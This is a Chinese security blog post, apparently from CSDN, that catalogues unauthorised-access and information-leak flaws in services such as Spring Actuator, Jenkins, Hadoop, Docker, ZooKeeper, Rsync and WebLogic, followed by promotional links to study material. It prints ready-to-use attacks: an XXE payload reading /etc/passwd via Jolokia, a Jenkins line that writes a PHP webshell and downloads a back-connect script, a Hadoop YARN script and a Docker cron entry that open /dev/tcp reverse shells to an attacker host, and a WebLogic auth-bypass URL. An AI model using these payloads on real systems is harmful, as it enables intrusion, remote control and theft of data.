敏感信息泄露总结_rabbitmq漏洞

/env 获取全部环境属性,数据库账户密码泄露,可获取mysql,managodb数据库的用户名和密码

/configprops 描述配置属性(包含默认值)如何注入Bean

/dump 获取线程活动的快照

/health 报告应用程序的健康指标,这些值由HealthIndicator的实现类提供,git项目地址泄露,可获取git项目的地址

/info 获取应用程序的定制信息,这些信息由info打头的属性提供

/mappings 描述全部的URI路径,以及它们和控制器(包含Actuator端点)的映射关系

/metrics 报告各种应用程序度量信息,比如内存用量和HTTP请求计数

/shutdown 关闭应用程序,要求endpoints.shutdown.enabled设置为true

/trace 提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)获取用户认证字段信息,,比如如下站点存在 actuator 配置不当漏洞,在其 trace 路径下,除了记录有基本的 HTTP 请求信息(时间戳、HTTP 头等),还有用户 token、cookie 字段

/heapdump 路径 #泄露站点内存信息,很多时候会包含用户的账户和密码


进阶利用  
 [Jolokia利用和env进阶利用思路](https://bbs.csdn.net/topics/618540462)  
 利用/jolokia/exec结合起来进行利用  
 1.xxe  
 vps的文件



1.fire.xml

<?xml version="1.0" encoding="utf-8" ?> %remote;%int;]>

&trick;

2.fire.dtd

<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">

客户端打payload



target-ip/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/vps-ip!/fire.xml


`8.Elasticsearch未授权访问`  
 漏洞原因:  
 Elasticsearch是用Java开发的企业级搜索引擎,默认端口9200,存在未授权访问漏洞时,可被非法操作数据


接口:



/_nodes #查看节点数据
/_cat/indices #索引
_cat/indices
/_plugin/head
/_nodes/
/_status
/_search?pretty


`9.Jenkis未授权访问`  
 概念:是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。  
 定位:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/06f123de2e8449d79337302a5ebdcf5f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 漏洞地址(未经授权访问的):  
 http://192.168.254.151:8080/manage  
 http://192.168.254.151:8080/script


典型命令



查询当前用户
println “whoami”.execute().text
查看ip配置信息
println “ifconfig -a”.execute().text


复现方法:  
 访问manage页面后点击脚本命令行


写shell  
 new File(“D:\phpstudy\_pro\WWW\ma.php”).write(’<?php @eval($\_POST[cmd]);?>’);


利用wget命令远程下载shell


println “wget http://xxx.secpulse.com/tools/back.py -P /tmp/”.execute().text  
 println “python /tmp/back.py 10.1.1.111 8080”.execute().text  
 back.py并不需要root权限


poc进行利用漏洞


`10.JBoss未授权访问`


概念:JBoss是一个基于J2EE的开放源代码的应用服务器。( 个人更加喜欢理解为组件服务器)


漏洞原因:  
 JBoss默认访问jmx-console页面不需要输入密码,或者默认密码admin/admin


部署马方法  
 两个思路部署马


批量脚本:  
 https://github.com/joaomatosf/jexboss


`11.Hadoop`  
 概念:是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。


定位:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/27d174c76bba4d9180089d736103671a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)


利用payload:



反弹shell结合shell脚本即可
#!/usr/bin/env python

import requests

target = ‘http://192.168.92.131:8088/’
lhost = ‘192.168.10.136’ # put your localhost ip here, and listen at port 9999

url = target +‘ws/v1/cluster/apps/new-application’
resp = requests.post(url)
app_id = resp.json()[‘application-id’]
url = target + ‘ws/v1/cluster/apps’
data = {
‘application-id’: app_id,
‘application-name’: ‘get-shell’,
‘am-container-spec’: {
‘commands’: {
‘command’: ‘/bin/bash -i >& /dev/tcp/%s/9999 0>&1’ %lhost,
},
},
‘application-type’: ‘YARN’,
}
requests.post(url, json=data)


`12.VNC未授权访问`  
 概念:VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。  
 VNC 默认端口号为 5900、5901。


利用方法:


12.1)  
 安装工具  
 VNC-Viewer-5.2.0-Windows-32bit.msi  
 客户端安装包下载链接:  
 https://pan.baidu.com/s/1phgU95Kfo4W1VboNIB6Mqg 提取码:htq9  
 安装过程,双击msi文件一路下一步就可以了。


12.2)进行连接  
 在 VNC 客户端输入目标服务器IP,之后点击确定、连接,即可成功控制目标服务器


![在这里插入图片描述](https://img-blog.csdnimg.cn/1a270e6afa74407187146e6cb6f70658.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/fefa9e69a87d4e33a790082fb42f891f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)


修复方法:给vnc配置密码


`13.docker未授权访问`


漏洞原因:docker remote api可以执行docker命令,docker守护进程监听在0.0.0.0,可直接调用API来操作docker。


标识页面:  
 ①页面显示这个


![在这里插入图片描述](https://img-blog.csdnimg.cn/7e52d080467349fdb0abf9f04fcc95c6.png)  
 ②查看目标基本信息  
 :2379/version  
 :2379/info  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/47db4595b8d54127994e4d595db0b1c4.png)  
 漏洞利用:



#1.新运行

sudo docker -H tcp://10.1.1.211:2375 run -it -v /:/mnt nginx:latest /bin/bash

#2、在容器内执行命令,将反弹shell的脚本写入到
/var/spool/cron/root echo ‘* * * * * /bin/bash -i >& /dev/tcp/10.1.1.214/12345 0>&1’ >> /mnt/var/spool/cron/crontabs/root


自己vps主机配置  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/88aeff42f4c340ac83a6f49d77f9b501.png)


`14.Zookeper未授权访问`  
 概念:ZooKeeper是一个分布式的、开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。


漏洞原因:  
 ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。  
 漏洞复现:echo envi|nc 192.168.15.74 2181  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/e8cacbaa81c94ee793b5000315604120.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_12,color_FFFFFF,t_70,g_se,x_16)


`15.Rsync未授权访问`  
 概念:  
 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。  
 漏洞原理:开启了rsync服务但是没设置配置密码,因此攻击者可以读写该服务


漏洞检测:


nmap检测  
 nmap -p 873 --script rsync-list-modules 192.168.193.128


漏洞复现:



连接后进行执行的常见命令
①查看模块列表
rsync rsync://your-ip:873/

②列出模块下文件
rsync rsync://your-ip:873/src/

③下载文件
rsync -av rsync://your-ip:873/src/etc/passwd

④上传文件
rsync -av shell rsync://your-ip:873/src/etc/cron.d/shell


`16.Active MQ 未授权访问`


概念:是一款流行的开源消息服务器。默认情况下,ActiveMQ 服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。


端口:8161  
 默认账户密码:admin/admin


页面定位:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/55bd28a19e0a4de885da4e4fd8e23bd7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)


`17.Dubbo 未授权访问`  
 概念:是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输 出和输入功能,可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。


检测方法:  
 连接接入方法  
 telent IP port


`18.Jupyter Notebook 未授权访问`  
 概念:基于网页的用于交互计算的应用程序。其可被应用于全过程计算:开发、文档编写、运行代码和展示结果  
 定位:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/6eac782379cb4fdf8b058065bffe8e26.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 漏洞复现:  
 选择 new -> terminal 即可创建一个控制台即可执行命令  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/c6133491714c4c57bdb99cb001ef8757.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/132c1d13253a4fa5812cef0305b39f45.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 `19.Kubernetes Api Server 未授权`  
 概念:k8s API Server提供了k8s各类资源对象(pod,RC,Service等)的增删改查及watch等HTTP Rest接口,是整个系统的数据总线和数据中心。


常见路径:



/pods
获取环境变量、运行的容器信息、命名空间等信息。
/ui
获取api的仪表盘
/
直接获取api接口的


定位:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/9a9043e3cf2f4e0ab944d335ca4d6bda.png)  
 `20.Ldap未授权访问`  
 概念:LDAP中文全称为:轻型目录访问协议(Lightweight Directory Access Protocol),默认使用389, LDAP 底层一般使用 TCP 或 UDP 作为传输协议。


检测方法:  
 ldapbrowser软件  
 https://ldapbrowserwindows.com/


软件直接连接,获取目录内容。


`21.Memcached 未授权访问`  
 概念:一套分布式的高速缓存系统,由LiveJournal的Brad Fitzpatrick开发,但被许多网站使用。


检测利用方法:



①直接连接即可
telnet 10.10.4.89 11211
或者
nc -vv 11211

②命令利用(列出服务)
stats


`22.NFS未授权访问`  
 概念:Network File System(NFS),是由SUN公司研制的UNIX表示层协议(pressentation layer protocol),能使使用者访问网络上别处的文件就像在使用自己的计算机一样。


利用方法:直接连接即可


`23.RabbitMQ 未授权访问`  
 概念:一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。消息可以是人类可读的JSON,简单字符串或可以转换为JSON字符串的值列表。


定位:![在这里插入图片描述](https://img-blog.csdnimg.cn/f455bbcf538c4eb09c34ad24f8cd123b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)


默认密码:admin/admin


`24.sorl未经授权访问`


概念:Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。solr未授权访问的危害很大,轻则可查询所有数据库信息,重则可读取系统任意文件,甚至getshell。


漏洞路径:/sorl/admin


漏洞定位页面:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/e94bcc8255f44b698fe04a38f6a47a95.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 `25.Spark 未授权访问`  
 概念:Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动访问控制,攻击者可以在集群中执行任意代码。  
 定位:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/0ba93b6d91a24c16ac414cb3154fa631.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)getshell方法:



msf里面的模块
use exploit/linux/http/spark_unauth_rce


`26.weblogic未授权访问`  
 漏洞原理:  
 Weblogic是Oracle公司推出的J2EE应用服务器,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令


执行命令:  
 ①直接到后台  
 http://192.168.126.130:7001/console/css/%252e%252e%252fconsole.portal  
 ②在console里面进行执行代码


`27.Zabbix 未授权访问`  
 概念:  
 zabbix是一款服务器监控软件,默认服务开放端口为10051,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。


漏洞定位:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8a3507c259414186983d33386dcc678b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)


`28.CouchDB 未授权访问`  
 CouchDB 未授权访问


概念:是一个开源数据库,默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能


漏洞页面:



①直接访问
②_config页面(可以获取到配置页面)
/_config


### 四.其他信息泄露


云存储安全


给我自己的理解 其实就三种问题  
 ①泄露问题  
 ②更改问题  
 ③子域名接管问题  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/4c3cdd52195a4b0f9b1bb53d1a86793e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)


![在这里插入图片描述](https://img-blog.csdnimg.cn/1b76b826fe44427ba7991f40949fcdd9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 `1.一般的四种显示页面(跟域名没啥关系 主要是code字段回显)`  
 1.1)  
 无存储桶时  
 InvalidBucketName:表示存储桶的名称不符合规范,属于无效的存储桶名称。![在这里插入图片描述](https://img-blog.csdnimg.cn/edd7f15f0a00464b85dafc87a570932c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 NoSuchBucket:表示没有这个存储桶。(这个也是用来判断子域名是否可以被接管的方法)


![在这里插入图片描述](https://img-blog.csdnimg.cn/45c7785762d948ad87a86babf579c228.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 1.2)  
 存储存在时  
 一种是完全回显  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/b8ba0a1bb6114406938031f219710476.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 一种是回显没有权限  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/aa875588544f42a58a6e39807843cf4f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 `2.策略泄露的利用`  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/0d7efe3c9e2945b3af58766428099639.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  
 `3.3具体案例`  
 [具体的攻击方法](https://bbs.csdn.net/topics/618540462)


`4.常见六个云存储平台密钥特征定位`  
 4.1)阿里云


连接工具:  
 https://help.aliyun.com/document\_detail/209974.html  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/4e36485c9a6e4463825b3d87439558c9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAZ29kZGVtb24=,size_20,color_FFFFFF,t_70,g_se,x_16)  



还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!


王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。


对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!


【完整版领取方式在文末!!】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)





内容实在太多,不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供:


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 9
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值